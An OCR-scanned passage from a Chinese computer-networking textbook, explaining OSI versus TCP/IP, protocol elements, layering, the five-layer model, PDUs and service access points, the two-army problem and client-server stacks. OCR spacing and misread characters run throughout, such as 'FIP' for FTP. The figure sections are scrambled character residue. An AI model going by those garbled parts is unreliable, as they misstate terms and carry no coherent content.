按照 一 般 的 概念 ,网 络 技术 和 设备 只 有 符合 有 关 的 国际 标准 才能 大 范围 地 获得 工程 
上 的 应 用 。 但 现在 情况 却 反 过 来 了 。 得 到 最 广泛 应 用 的 不 是 法 律 上 的 国际 标准 OSI, 而 
是 非 国际 标准 TCP/IP。 这 样 ,TCP/IP 就 常 被 称 为 是 事实 上 的 国际 标准 。 从 这 种 意义 上 
说 ,能 够 占领 市 场 的 就 是 标准 。 在 过 去 制定 标准 的 组 织 中 往往 以 专家 、 学 者 为 主 。 但 现在 
许多 公司 都 纷纷 挤 进 各 种 各 样 的 标准 化 组 织 , 使 得 技术 标准 具有 浓厚 的 商业 气息 。 一 个 
新 标准 的 出 现 , 有 时 不 一 定 反映 其 技术 水 平 是 最 先进 的 ,而 是 往往 有 着 一 定 的 市 场 背景 。 

顺便 说 一 下 ,虽然 OSI 在 一 开始 是 由 ISO 来 制定 ,但 后 来 的 许多 标准 都 是 ISO 与 原 
来 的 国际 电报 电话 咨询 委员 会 CCITT 联合 制定 的 。 从 历史 上 来 看 ,CCITT 原来 是 从 通 
信 的 角度 考虑 一 些 标准 的 制定 ,而 ISO 则 关心 信息 的 处 理 。 但 随 着 科学 技术 的 发 展 , 通 
信和 与 信息 处 理 的 界限 变 得 比较 模糊 了 。 于 是 ,通信 与 信息 处 理 就 都 成 为 CCITT 与 ISO 
所 共同 关心 的 领域 。CCITT 的 建议 书 X. 200 就 是 关于 开放 系统 互 连 参 考 模型 , 它 和 上 面 
提 到 的 ISO 7498 基本 上 是 相同 的 。 

2. 协议 与 划分 层次 

在 计算 机 网 络 中 要 做 到 有 条 不 亲 地 交换 数据 ,就 必须 遵守 一 些 事先 约定 好 的 规则 。 
这 些 规则 明确 规定 了 所 交换 的 数据 的 格式 以 及 有 关 的 同步 问题 。 这 里 所 说 的 同步 不 是 狭 
义 的 ( 即 同 频 或 同 频 同 相 ) ,而 是 广义 的 , 即 在 一 定 的 条 件 下 应 当 发 生 什 么 事件 (如 发 送 一 
个 应 答 信 息 ) ,因而 同步 含有 时 序 的 意思 。 这 些 为 进行 网 络 中 的 数据 交换 而 建立 的 规则 、 
标准 或 约定 称 为 网 络 协 议 (network protocol) 。 网 络 协议 也 可 简称 为 协议 。 更 进一步 讲 ， 
网 络 协议 主要 由 以 下 三 个 要 素 组 成 : 

(1) 语法 , 即 数 据 与 控制 信息 的 结构 或 格式 ; 

(2) 语义 , 即 需 要 发 出 何 种 控制 信息 ,完成 何 种 动作 以 及 做 出 何 种 响应 ; 

(3) 同步 , 即 事 件 实现 顺序 的 详细 说 明 。 

由 此 可 见 , 网 络 协议 是 计算 机 网 络 的 不 可 缺少 的 组 成 部 分 。 实 际 上 ,只 要 我 们 想 让 连 
接 在 网 络 上 的 另 一 台 计 算 机 做 点 什么 事情 (例如 ,从 网 络 上 的 某 个 主机 下 载 文 件 ) ,我 们 都 
需要 有 协议 。 但 是 当 我 们 经 常 在 自己 的 PC 上 进行 文件 存盘 操作 时 ,就 不 需要 任何 网 络 
协议 ,除非 这 个 用 来 存储 文件 的 磁盘 是 网 络 上 的 某 个 文件 服务 器 的 磁盘 。 

协议 通常 有 两 种 不 同 的 形式 。 一 种 是 使 用 便于 人 来 阅读 和 理解 的 文字 描述 。 另 一 种 
是 使 用 让 计算 机 能 够 理解 的 程序 代码 。 这 两 种 不 同形 式 的 协议 都 必须 能 够 对 网 络 上 信息 
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交换 过 程 做 出 精确 的 解释 。ARPANET 的 研制 经 验 表 明 , 对 于 非常 复杂 的 计算 机 网 络 协 
议 ,其 结构 应 该 是 层次 式 的 。 我 们 可 以 举 一 个 简单 的 例子 来 说 明 划 分 层次 的 概念 。 

现在 假定 在 主机 1 和 主机 2 之 间 通 过 一 个 通信 网 络 传送 文件 。 这 是 一 件 比 较 复 杂 的 
工作 ,因为 需要 做 不 少 的 工作 。 

可 以 将 要 做 的 工作 划分 为 三 类 。 第 一 类 工作 与 传送 文件 直接 有 关 。 例 如 ,发 送 端的 
文件 传送 应 用 程序 应 当 确信 接收 端的 文件 管理 程序 已 做 好 接收 和 存储 文件 的 准备 。 若 两 
个 主机 所 用 的 文件 格式 不 一 样 , 则 至 少 其 中 的 一 个 主机 应 完成 文件 格式 的 转换 。 这 两 件 
工作 可 用 一 个 文件 传送 模块 来 完成 。 这 样 , 两 个 主机 可 将 文件 传送 模块 作为 最 高 的 一 层 。 
但 是 ,我们 并 不 想 让 文件 传送 模块 完成 全 部 工作 的 细节 ,这 样 会 使 文件 传送 模块 过 于 复 
杂 。 可 以 再 设立 一 个 通信 服务 模块 ,用 来 保证 文件 和 文件 传送 命令 可 靠 地 在 两 个 系统 之 
间 交 换 。 也 就 是 说 ,让 位 于 上 面 的 文件 传送 模块 利用 下 面 的 通信 服务 模块 所 提供 的 服务 。 
我 们 还 可 以 看 出 ,如 果 将 位 于 上 面 的 文件 传送 模块 换 成 电子 邮件 模块 ,那么 电子 邮件 模块 
同样 可 以 利用 在 它 下 面 的 通信 服务 模块 所 提供 的 可 靠 通信 的 服务 。 同 样 道理 ,我 们 再 构 
造 一 个 网 络 接 人 模块 ,让 这 个 模块 负责 做 与 网 络 接口 细节 有 关 的 工作 ,并 向 上 层 提供 服 
务 , 使 上 面 的 通信 服务 模块 能 够 完成 可 靠 通信 的 任务 。 

从 上 述 简单 例子 可 以 更 好 地 理解 分 层 可 以 带 来 很 多 好 处 。 如 : 

(1) 各 层 之 间 是 独立 的 。 某 一 层 并 不 需要 知道 它 的 下 一 层 是 如 何 实现 的 ,而 仅仅 需 
要 知道 该 层 通过 层 间 的 接口 ( 即 界面 ) 所 提供 的 服务 。 由 于 每 一 层 只 实现 一 种 相对 独立 的 
功能 ,因而 可 将 一 个 难以 处 理 的 复杂 问题 分 解 为 若干 个 较 容易 处 理 的 更 小 一 些 的 问题 。 
这 样 ,整个 问题 的 复杂 程度 就 下 降 了 。 

(2) 灵活 性 好 。 当 任何 一 层 发 生变 化 时 (例如 由 于 技术 的 变化 ), 只 要 层 间接 口 关系 
保持 不 变 , 则 在 这 层 以 上 或 以 下 各 层 均 不 受 影响 。 此 外 ,对 某 一 层 提供 的 服务 还 可 进行 修 
改 。 当 某 层 提供 的 服务 不 青 需要 时 ,甚至 可 以 将 这 层 取消 。 

(3) 结构 上 可 分 割 开 。 各 层 都 可 以 采用 最 合适 的 技术 来 实现 。 

(4) 易于 实现 和 维护 。 这 种 结构 使 得 实现 和 调试 一 个 庞大 而 又 复杂 的 系统 变 得 易于 
处 理 ,因为 整个 的 系统 已 被 分 解 为 若干 个 相对 独立 的 子 系统 。 

(5) 能 促进 标准 化 工作 。 因 为 每 一 层 的 功能 及 其 所 提供 的 服务 都 已 有 了 精确 的 
说 明 。 

分 层 时 应 注意 使 每 一 层 的 功能 非常 明确 。 若 层 数 太 少 ,就 会 使 每 一 层 的 协议 太 复杂 。 
但 层 数 太 多 又 会 在 描述 和 综合 各 层 功 能 的 系统 工程 任务 时 遇 到 较 多 的 困难 。 通 常 各 层 所 
要 完成 的 功能 主要 有 以 下 一 些 ( 可 以 只 包括 一 种 ,也 可 以 包括 多 种 ): 

(1) 差错 控制 ,使 得 和 网 络 对 等 端的 相应 层次 的 通信 更 加 可 靠 。 

(2) 流量 控制 ,使 得 发 送 端的 发 送 速率 不 要 太 快 ,要 使 接收 端 来 得 及 接收 。 

(3) 分 段 和 重 装 , 发 送 端 将 要 发 送 的 数据 块 划分 为 更 小 的 单位 ,在 接收 端 将 其 还 原 。 

(4) 复 用 和 分 用 ,发 送 端 几 个 高 层 会 话 复 用 一 条 低层 的 连接 ,在 接收 端 再 进行 分 用 。 

(5) 连接 建立 和 释放 ,交换 数据 前 先 建立 一 条 逻辑 连接 。 数 据 传送 结束 后 释放 连接 。 

分 层 当 然 也 有 一 些 缺 点 ,例如 ,有 些 功 能 会 在 不 同 的 层次 中 重复 出 现 ,因而 产生 了 人 额 
外 开销 。 
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我 们 把 计算 机 网 络 的 各 层 及 其 协议 的 集合 , 称 为 网 络 的 体系 结构 (architecture) 。 换 
种 说 法 ,计算 机 网 络 的 体系 结构 就 是 这 个 计算 机 网 络 及 其 构件 所 应 完成 的 功能 的 精确 定 
义 。 需 要 强调 的 是 : 这 些 功 能 究竟 是 用 何 种 硬件 或 软件 完成 的 , 则 是 一 个 遵循 这 种 体系 
结构 的 实现 的 问题 。 体 系 结构 的 英文 名 词 architecture 的 原意 是 建筑 学 或 建筑 的 设计 和 
风格 。 它 和 一 个 具体 的 建筑 物 的 概念 很 不 相同 。 例 如 ,我 们 可 以 走 进 一 个 明代 的 建筑 物 
中 ,但 却 不 能 走 进 一 个 明代 的 建筑 风格 之 中 。 同 理 , 我 们 也 不 能 把 一 个 具体 的 计算 机 网 络 
说 成 是 一 个 抽象 的 网 络 体系 结构 。 总 之 ,体系 结构 是 抽象 的 ,而 实现 则 是 具体 的 ,是 真正 
运行 中 的 计算 机 硬件 和 软件 。 

3. 具有 五 层 协 议 的 体系 结构 

OSI 的 七 层 协议 体系 结构 (图 2-10(a)) 的 概念 清楚 ,理论 也 较 完整 ,但 它 既 复杂 又 不 
实用 。TCP/IP 体系 结构 则 不 同 , 但 它 现 在 却 得 到 了 非常 广泛 的 应 用 。TCP/IP 是 一 个 四 
层 的 体系 结构 (图 2-10(b)), 它 包含 应 用 层 ,传输 层 、 网 际 层 和 网 络 接口 层 (用 网 际 层 这 个 
名 字 是 强调 这 一 层 是 为 了 解决 不 同 网 络 的 互 连 问题 ) 。 不 过 从 实质 上 讲 ,TCP/IP 只 有 最 
上 面 的 三 层 , 因 为 最 下 面 的 网 络 接口 层 并 没有 什么 具体 内 容 。 因 此 在 学 习 计 算 机 网 络 的 
原理 时 往往 采取 折 中 的 办 法 , 即 综合 OSI 和 TCP/IP 的 优点 ,采用 一 种 只 有 五 层 协议 的 体 
系 结构 (图 2-10(c)) ,这 样 既 简洁 又 能 将 概念 阐述 清楚 。 
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图 2-10 计算 机 网 络 体系 结构 


现在 结合 互联 网 的 情况 , 自 上 而 下 地 非常 简要 地 介绍 一 下 各 层 的 主要 功能 。 

1) 应 用 层 

应 用 层 (application layer) 是 体系 结构 中 的 最 高 层 。 应 用 层 直接 为 用 户 的 应 用 进程 提 
供 服务 。 这 里 的 进程 就 是 指正 在 运行 的 程序 。 在 互联 网 中 的 应 用 层 协议 很 多 ,如 支持 万 
维 网 应 用 的 HTTP 协议 ,支持 电子 邮件 的 SMTP 协议 ,支持 文件 传送 的 FIP 协议 ,等 等 。 
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2) 传输 层 

传输 层 (transport layer) 的 任务 就 是 负责 向 两 个 主机 中 进程 之 间 的 通信 提供 服务 。 
由 于 一 个 主机 可 同时 运行 多 个 进程 ,因此 传输 层 有 复 用 和 分 用 的 功能 。 复 用 就 是 多 个 应 
用 层 进程 可 同时 使 用 下 面 传 输 层 的 服务 ,分 用 则 是 传输 层 把 收 到 的 信息 分 别 交付 给 上 面 
应 用 层 中 的 相应 的 进程 。 传 输 层 主要 使 用 以 下 两 种 协议 : 

(1) 传输 控制 协议 (Transmission Control Protocol,TCP) ,面向 连接 的 ,数据 传输 的 
单位 是 报 文 段 (segment) ,能 够 提供 可 靠 的 交付 。 

(2) 用 户 数据 报 协议 (User Datagram Protocol,UDP) ,无 连接 的 ,数据 传输 的 单位 是 
用 户 数据 报 , 不 保证 提供 可 靠 的 交付 ,只 能 提供 “* 尽 最 大 努力 变 付 (bestreffort delivery)”。 

3) 网 络 层 

网 络 层 (network layer) 负 责 为 分 组 交换 网 上 的 不 同 主机 提供 通信 和 服务。 在 发 送 数据 
时 ,网 络 层 把 传输 层 产 生 的 报 文 段 或 用 户 数据 报 封装 成 分 组 或 包 进 行 传送 。 在 TCP/IP 
体系 中 ,由 于 网 络 层 使 用 IP 协议 ,因此 分 组 也 称 为 IP 数据 报 ,或 简称 为 数据 报 。 网 络 层 
的 另 一 个 任务 就 是 要 选择 合适 的 路 由 ,使 源 主 机 传输 层 所 传 下 来 的 分 组 ,能够 通过 网 络 中 
的 路 由 器 找到 目的 主机 。 这 里 要 强调 指出 ,网 络 层 中 的 “网 络 ? 二 字 ,已 不 是 我 们 通常 谈 到 
的 具体 的 网 络 ,而 是 在 计算 机 网 络 体系 结构 模型 中 的 专用 名 词 。 

对 于 由 广播 信道 构成 的 分 组 交换 网 ,路 由 选择 的 问题 很 简单 ,因此 这 种 网 络 的 网 络 层 
非常 简单 ,甚至 可 以 没有 。 互 联网 由 大 量 的 异 构 网 络 通过 路 由 器 相互 连接 起 来 。 互 联网 
主要 的 网 络 层 协议 是 无 连接 的 网 际 协议 IP 和 许多 种 路 由 选择 协议 ,因此 互联 网 的 网 络 层 
也 称 为 网 际 层 或 IP 层 。 

4) 数据 链 路 层 

数据 链 路 层 常 简称 为 链 路 层 。 我 们 知道 ,两 个 主机 之 间 的 数据 传输 ,总 是 在 一 段 一 段 
的 链 路 上 传送 ,也 就 是 说 ,在 两 个 相 邻 结 点 之 间 ( 主 机 和 路 由 器 之 间 ,或 两 个 路 由 器 之 间 ) 
传送 数据 是 直接 传送 的 (点 对 点 )。 这 时 就 需要 使 用 专门 的 链 路 层 的 协议 。 在 两 个 相 邻 结 
点 之 间 传 送 数 据 时 ,数据 链 路 层 (data link layer) 将 网 络 层 交 下 来 的 IP 数据 报 组 装 成 帧 
(framing) ,在 两 个 相 邻 结 点 间 的 链 路 上 “透明 ”地 传送 帧 中 的 数据 。 每 一 帧 包括 数据 和 必要 
的 控制 信息 (如 同步 信息 、 地 址 信息 、 差 错 控 制 等 )。 典 型 的 帧 长 是 几 百 字 节 到 一 千 多 字 节 。 

“透明 "是 一 个 很 重要 的 术语 。 它 表示 : 某 一 个 实际 存在 的 事物 看 起 来 却 好 像 不 存在 
一 样 。“ 在 数据 链 路 层 透明 传送 数据 ”表示 无 论 什 么 样 的 比特 组 合 的 数据 都 能 够 通过 这 个 
数据 链 路 层 。 因 此 ,对 所 传送 的 数据 来 说 ,这 些 数据 就 “看 不 见 " 数 据 链 路 层 。 或 者 说 , 数 
据 链 路 层 对 这 些 数据 来 说 是 透明 的 。 

在 接收 数据 时 ,控制 信息 使 接收 端 能 够 知道 一 个 帧 从 哪个 比特 开始 和 到 哪个 比特 结 
束 。 这 样 ,数据 链 路 层 在 收 到 一 个 帧 后 ,就 可 从 中 提取 出 数据 部 分 ,上 交 给 网 络 层 。 

控制 信息 还 使 接收 端 能 够 检测 到 所 收 到 的 帧 中 有 无 差错 。 如 发 现 有 差错 ,数据 链 路 
层 就 简单 地 丢弃 这 个 出 了 差错 的 帧 ,以免 继续 传送 下 去 白白 浪费 网 络 资源 。 如 果 需 要 改 
正 错误 ,就 由 传输 层 的 TCP 协议 来 完成 。 

5) 物理 层 

在 物理 层 (physical layer) 上 所 传 数据 的 单位 是 比特 。 物 理 层 的 任务 就 是 透明 地 传送 


第 2 章 计算 机 网 络 概述 \@@2 


比特 流 。 也 就 是 说 ,发 送 方 发 送 1( 或 0) 时 ,接收 方 应 当 收 到 1( 或 0) 而 不 是 0( 或 1) 。 因 
此 物理 层 要 考虑 用 多 大 的 电压 代表 “1” 或 “0”, 以 及 接收 方 如 何 识别 出 发 送 方 所 发 送 的 比 
特 。 物 理 层 还 要 确定 连接 电缆 的 插头 应 当 有 多 少 根 引 脚 以 及 各 条 引 脚 应 如 何 连接 。 当 
然 , 解 释 比 特 代表 什么 意思 , 则 不 是 物理 层 所 要 管 的 。 请 注意 ,传递 信息 所 利用 的 一 些 物 
理 媒体 ,如 双 绞 线 、 同 轴 电 缆 、 光 缆 、 无 线 信道 等 ,并 不 在 物理 层 协议 之 内 而 是 在 物理 层 协 
议 的 下 面 。 因 此 也 有 人 把 物理 媒体 当 作 第 0 层 。 
在 互联 网 所 使 用 的 各 种 协议 中 ,最 重要 的 和 最 著名 的 就 是 TCP 和 IP 两 个 协议 。 现 
在 人 们 经 常 提 到 的 TCP/IP 并 不 一 定 是 单 指 TCP 和 IP 这 两 个 具体 的 协议 ,而 往往 是 表 
示 互 联网 所 使 用 的 整个 TCP/IP 协议 族 。 图 2-11 显示 了 应 用 进程 的 数据 在 各 层 之 间 的 
传递 过 程 中 所 经 历 的 变化 。 这 里 为 简单 起 见 ,假定 两 个 主机 是 直接 相连 的 。 
主机 1 注意 观察 加 入 或 剥 去 首部 (尾部 ) 的 层次 主机 2 


AP， 应 用 层 首部 | 应 用 程序 数据 AP, 


传输 层 首部 下 


应 用 程序 数据 5 


网 络 层 首部 
链 路 层 
首 前 


加 [二 | 点 用 程序 数据 4 
站 链 路 层 
Hs| 辑 | 十 | “应 用 程序 数据 尾部 | 3 


| 
国 
| | ZL 站 
由 


H, | H Bo IHS ”应 用 程序 数据 TD, 2 


10100110100101 ”比特 流 110101110101 1 


0 ) 


2-11 数据 在 各 层 之 间 的 传递 过 程 


假定 主机 1 的 应 用 进程 AP, 向 主机 2 的 应 用 进程 AP, 传送 数据 。AP, 先 将 其 数据 
交 给 本 主机 的 第 5 层 (应 用 层 ) 。 第 5 层 加 上 必要 的 控制 信息 Hs 就 变 成 了 下 一 层 的 数据 
单元 。 第 4 层 (传输 层 ) 收 到 这 个 数据 单元 后 ,加 上 本 层 的 控制 信息 H, ,再 交 给 第 3 层 (网 
络 层 ) ,成 为 第 3 层 的 数据 单元 。 依 此 类 推 。 不 过 到 了 第 2 层 ( 数 据 链 路 层 ) 后 ,控制 信息 
分 成 两 部 分 ,分 别 加 到 本 层 数 据 单元 的 首部 Hs 和 尾部 T: ,而 第 1 层 ( 物 理 层 ) 由 于 是 比特 
流 的 传送 ,所 以 不 再 加 上 控制 信息 。 请 注意 ,传送 比特 流 时 应 从 首部 开始 传送 。 

OSI 参考 模型 把 对 等 层次 之 间 传 送 的 数据 单位 称 为 该 层 的 协议 数据 单元 (Protocol 
Data Unit,PDU) 。 这 个 名 词 现 已 被 许多 非 OSI 标准 采用 。 

当 这 一 串 的 比特 流离 开 主 机 1 经 网 络 的 物理 媒体 传送 到 目的 站 主机 2 时 ,就 从 主机 
2 的 第 1 层 依 次 上 升 到 第 5 层 。 每 一 层 根据 控制 信息 进行 必要 的 操作 ,然后 将 控制 信息 
和 剥 去 ,将 该 层 剩 下 的 数据 单元 上 交 给 更 高 的 一 层 。 最 后 ,把 应 用 进程 AP; 发 送 的 数据 交 
给 目的 站 的 应 用 进程 AP。， 。 

可 以 用 一 个 简单 例子 来 比喻 上 述 过 程 。 有 一 封 信 从 最 高 层 向 下 传 。 每 经 过 一 层 就 包 
上 一 个 新 的 信封 , 写 上 必要 的 地 址 信息 。 包 有 多 个 信封 的 信件 传送 到 目的 站 后 ,从 第 1 层 
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起 ,每 层 拆 开 一 个 信封 后 就 把 信封 中 的 信 交 给 它 的 上 一 层 。 传 到 最 上 层 后 ,取出 发 信人 所 
发 的 信 交 给 收 信人 。 虽 然 应 用 进程 数据 要 经 过 如 图 2-11 所 示 的 复杂 过 程 才能 送 到 终点 
的 应 用 进程 ,但 这 些 复杂 过 程 对 用 户 来 说 , 却 都 被 屏蔽 掉 了 ,以 致 应 用 进程 AP, 觉得 好 像 
是 直接 把 数据 交 给 了 应 用 进程 AP。 。 同 理 , 任 何 两 个 同样 的 层次 (例如 在 两 个 系统 的 第 4 
层 ) 之 间 , 也 好 像 如 同 图 中 的 水 平 位 置 所 示 的 那样 ,将 数据 ( 即 数据 单元 加 上 控制 信息 ) 直 
接 传递 给 对 方 。 这 就 是 所 谓 的 “对 等 层 ?之 间 的 通信 。 我 们 以 前 经 常 提 到 的 各 层 协议 , 实 
际 上 就 是 在 各 个 对 等 层 之 间 传 递 数 据 时 的 各 项 规定 。 

4. 实体 .协议 .服务 和 服务 访问 点 

当 研 究 开放 系统 中 的 信息 交换 时 ,往往 使 用 实体 Centity) 这 一 较为 抽象 的 名 词 表 示 任 
何 可 发 送 或 接收 信息 的 硬件 或 软件 进程 。 在 许多 情况 下 ,实体 就 是 一 个 特定 的 软件 模块 。 

协议 是 控制 两 个 对 等 实体 (或 多 个 实体 ) 进 行 通信 的 规则 的 集合 。 协 议 的 语法 方面 的 
规则 定义 了 所 交换 的 信息 的 格式 ,而 协议 的 语义 方面 的 规则 就 定义 了 发 送 者 或 接收 者 所 
要 完成 的 操作 ,例如 ,在 何 种 条 件 下 数据 必须 重 传 或 丢弃 。 在 协议 的 控制 下 ,两 个 对 等 实 
体 间 的 通信 使 得 本 层 能 够 向 上 一 层 提 供 服 务 。 要 实现 本 层 协 议 , 还 需要 使 用 下 面 一 层 所 
提供 的 服务 。 一 定 要 和 弄 清 楚 , 协 议和 服务 在 概念 上 是 很 不 一 样 的 。 

首先 ,协议 的 实现 保证 了 能 够 向 上 一 层 提 供 服务 。 使 用 本 层 服务 的 实体 只 能 看 见 服 
务 而 无 法 看 见 下 面 的 协议 。 下 面 的 协议 对 上 面 的 实体 是 透明 的 。 

其 次 ,协议 是 “水 平 的 ”, 即 协议 是 控制 对 等 实体 之 间 通 信 的 规则 。 但 服务 是 “垂直 
的 ”, 即 服务 是 由 下 层 向 上 层 通 过 层 间 接口 提供 的 。 另 外 ,并 非 在 一 个 层 内 完成 的 全 部 
功能 都 称 为 服务 。 只 有 那些 能 够 被 高 一 层 实体 “看 得 见 ” 的 功能 才能 称 之 为 “服务 ”。 
上 层 使 用 下 层 所 提供 的 服务 必须 通过 与 下 层 交 换 一 些 命令 ,这 些 命令 在 OSI 中 称 为 服 

在 同一 系统 中 相 邻 两 层 的 实体 进行 交互 ( 即 交 换 信息 ) 的 地 方 ,通常 称 为 服务 访问 点 
(Service Access Point,SAP)。SAP 是 一 个 抽象 的 概念 , 它 实际 上 就 是 一 个 人 逻辑 接口 ,有 
点 像 邮 政信 箱 ( 可 以 把 邮件 放 入 信箱 和 从 信箱 中 取 走 邮件 ) ,但 这 种 层 间 接口 和 两 个 设备 
之 间 的 硬件 接口 (并 行 的 或 串 行 的 ) 并 不 一 样 。OSI 把 层 与 层 之 间 交 换 的 数据 的 单位 称 为 
服务 数据 单元 (Service Data Unit,SDU) , 它 可 以 与 PDU 不 一 样 。 例 如 ,可 以 是 多 个 SDU 
合成 为 一 个 PDU ,也 可 以 是 一 个 SDU 划分 为 几 个 PDU。 这 样 ,在 任何 相 邻 两 层 之 间 的 
关系 可 概括 为 图 2-12 所 示 的 那样 。 这 里 要 注意 的 是 ,第 n 层 的 两 个 “实体 (n)” 之 间 通 过 
“协议 (n) ?进行 通信 ,而 第 n 十 1 层 的 两 个 “实体 (n 十 1)” 之 间 则 通过 另外 的 “协议 (n 十 1)” 


服务 用 户 。 实体 (71) | -协议 er _ -| 实体) | 。 第 +1! 层 


fl 交换 原 语 交换 原 语 


局 

次 
注 
等 
杰 
闪 
完 

| 

1 

| 

1 

1 
机 
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图 2-12 相 邻 两 层 之 间 的 关系 
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进行 通信 (每 一 层 都 使 用 不 同 的 协议 )。 第 n 层 向 上 面 的 第 n 十 1 层 所 提供 的 服务 实际 上 
已 包括 了 在 它 以 下 各 层 所 提供 的 服务 。 第 n 层 的 实体 对 第 n 十 1 层 的 实体 就 相当 于 一 个 
服务 提供 者 。 在 服务 提供 者 的 上 一 层 的 实体 又 称 为 “服务 用 户 ”, 因 为 它 使 用 下 层 服务 提 
供 者 所 提供 的 服务 。 

计算 机 网 络 的 协议 还 有 一 个 很 重要 的 特点 ,就 是 协议 必须 把 所 有 不 利 的 条 件 事先 
都 估计 到 ,而 不 能 假定 一 切 都 是 正常 的 和 非常 理想 的 。 例 如 ,两 个 朋友 在 电话 中 约会 
好 ,下 午 3 时 在 某 公园 门口 碰头, 并且 约定 “不 见 不 散 ”"。 这 就 是 一 个 很 不 科学 的 协议 ， 
因为 任何 一 方 临时 有 急事 来 不 了 而 又 无 法 通知 对 方 时 (如 对 方 的 电话 或 手机 都 无 法 接 
通 ), 则 另 一 方 按照 协议 就 必须 永远 等 待 下 去 。 因 此 ,看 一 个 计算 机 网 络 协议 是 否 正 
确 , 不 能 只 看 在 正常 情况 下 是 否 正确 ,而 且 还 必须 非常 仔细 地 检查 这 个 协议 能 否 应 付 
各 种 异常 情况 。 

下 面 是 一 个 有 关 网 络 协议 的 非常 著名 的 例子 。 

【 例 2-1】 占据 东 、 西 两 个 山顶 的 蓝 军 1 和 蓝 军 2 与 驻扎 在 山谷 的 白 军 作战 。 其 力 
量 对 比 是 : 单独 的 蓝 军 1 或 蓝 军 2 打 不 过 白 军 ,但 蓝 军 1 和 蓝 军 2 协同 作战 则 可 战胜 
白 军 。 现 蓝 军 1 拟 于 次 日 正午 向 白 军 发 起 攻击 。 于 是 用 计算 机 发 送 电文 给 蓝 军 2。 但 
通信 线路 很 不 好 ,电文 出 错 或 丢失 的 可 能 性 较 大 (没有 电话 可 使 用 )。 因 此 要 求 收 到 电 
文 的 友军 必须 送 回 一 个 确认 电文 。 但 此 确认 电文 也 可 能 出 错 或 丢失 。 试 问 能 否 设计 出 
一 种 协议 使 得 蓝 军 1 和 蓝 军 2 能 够 实现 协同 作战 因而 一 定 ( 即 100% 而 不 是 99. 999…%) 
取得 胜利 ? 

【解答 】 

蓝 军 1 先 发 送 :“ 拟 于 明日 正午 向 白 军 发 起 攻击 。 请 协同 作战 和 确认 。” 

假定 蓝 军 2 收 到 电文 后 返回 了 确认 。 

然而 现在 蓝 军 1 和 蓝 军 2 都 不 敢 下 决心 进攻 。 因 为 , 蓝 军 2 不 知道 此 确认 电文 对 方 
是 否 正确 地 收 到 了 。 如 未 正确 收 到 , 则 蓝 军 1 必定 不 敢 贸 然 进攻 。 在 此 情况 下 ,自己 单方 
面 发 起 进攻 就 肯定 要 失败 。 因 此 ,必须 等 待 蓝 军 1 发 送 “ 对 确认 的 确认 ”。 

假定 蓝 军 2 收 到 了 蓝 军 1 发 来 的 确认 。 但 蓝 军 1 同样 关心 自己 发 出 的 确认 是 否 已 被 
对 方正 确 地 收 到 。 因 此 还 要 等 待 蓝 军 2 的 “对 确认 的 确认 的 确认 ”。 

这 样 无 限 循 环 下 去 , 蓝 军 1 和 蓝 军 2 都 始终 无 法 确定 自己 最 后 发 出 的 电文 对 方 是 否 
已 经 收 到 。 因 此 ,在 本 问题 给 出 的 条 件 下 ,没有 一 种 协议 可 以 使 蓝 军 1 和 蓝 军 2 能 够 
100% 地 确保 胜利 。 

这 个 例子 告诉 我 们 ,看 似 非 常 简单 的 协议 ,设计 起 来 要 考虑 的 问题 还 是 比较 多 的 。 

5. TCP/IP 的 体系 结构 

前 面 已 经 说 过 ,TCP/IP 的 体系 结构 比较 简单 , 它 只 有 四 层 。 图 2-13 给 出 了 用 这 种 四 
层 协议 表示 方法 的 例子 。 请 注意 ,图 中 的 路 由 器 在 转发 分 组 时 最 高 只 用 到 网 络 层 而 没有 
使 用 传输 层 和 应 用 层 。 

还 有 一 种 方法 ,就 是 分 层次 画 出 具体 的 协议 来 表示 TCP/IP 协议 族 ( 如 图 2-14 所 
示 ), 它 的 特点 是 上 下 两 头 大 而 中 间 小 : 应 用 层 和 网 络 接 口 层 都 有 多 种 协议 ,而 中 间 的 IP 
层 很 小 ,上 层 的 各 种 协议 都 向 下 汇聚 到 一 个 IP 协议 中 。 这 种 很 像 沙漏 计时 器 形状 的 
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主机 B 
4 | ”应 用 层 路 由 器 应 用 层 
3 | ”传输 层 ”7 传输 层 
2 | ”网 际 层 网 际 层 网 际 层 
1 网 络 网 络 
接口 层 接口 层 


2-13 ”TCP/IP 四 层 协 议 的 表示 方法 举例 


TCP/IP 协议 族 表明 : TCP/IP 协议 可 以 为 各 式 各 样 的 应 用 提供 服务 (所 谓 的 everything 
over IP) ,同时 TCP/IP 协议 也 允许 IP 协议 在 各 式 各 样 的 网 络 构成 的 互联 网 上 运行 (所 谓 
的 IP over everything)。 正 因为 如 此 ,互联 网 才 会 发 展 到 今天 的 这 种 全 球 规模 。 从 图 2-14 不 
难看 出 IP 协议 在 互联 网 中 的 核心 作用 。 


应 用 层 


网 络 接口 层 


网 络 接口 1 


网 络 接口 2|] … [网 络 接口 3 


图 2-14 沙漏 计时 器 形状 的 TCP/IP 协议 族 示意 


【 例 2-2〗 利用 协议 栈 的 概念 ,说 明 在 互联 网 中 常用 的 客户 服务 器 工作 方式 。 

【解答 】 

图 2-15 中 的 主机 A 和 主机 B 都 各 有 自己 的 协议 栈 。 主 机 A 中 的 应 用 进程 ( 即 客户 
进程 ) 的 位 置 在 最 高 的 应 用 层 。 这 个 客户 进程 向 主机 B 应 用 层 的 服务 器 进程 发 出 请 求 ， 
请 求 建立 连接 (图 中 的 @O)。 然 后 ,主机 也 中 的 服务 器 进程 接受 A 的 客户 进程 发 来 的 请 求 
(图 中 的 @) 。 所 有 这 些 通信 ,实际 上 都 需要 使 用 下 面 各 层 所 提供 的 服务 。 但 若 仅仅 考虑 
客户 进程 和 服务 器 进程 的 交互 , 则 可 把 它们 之 间 的 交互 看 成 是 如 图 2-15 中 的 水 平 虚线 所 
示 的 那样 。 

图 2-16 画 出 了 三 个 主机 的 协议 栈 。 主 机 C 的 应 用 层 中 同时 有 两 个 服务 器 进程 在 通 
信 。 服 务 器 1 在 和 主机 A 中 的 客户 1 通信 ,而 服务 器 2 在 和 主机 了 中 的 客户 2 通信 。 有 
的 服务 器 进程 可 以 同时 向 几 百 个 客户 进程 提供 服务 。 
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@ 客户 发 起 连接 建立 请 求 应 用 吕 

a -=--- 寺 CC 多 器 》 
名 服务 器 接受 连接 建立 请 求 
传输 慑 
以 后 就 逐 级 使 用 下 层 

“提供 的 服务 本 络 必 
(使 用 TCP 和 IP) 数据 链 路 层 

物理 层 


主机 A 主机 C 主机 B 
应 用 层 应 用 层 应 用 层 
传输 层 传输 层 传输 层 
网 络 层 网 络 层 网 络 层 
数据 链 路 层 数据 链 路 层 数据 链 路 层 
物理 层 物理 层 物理 层 
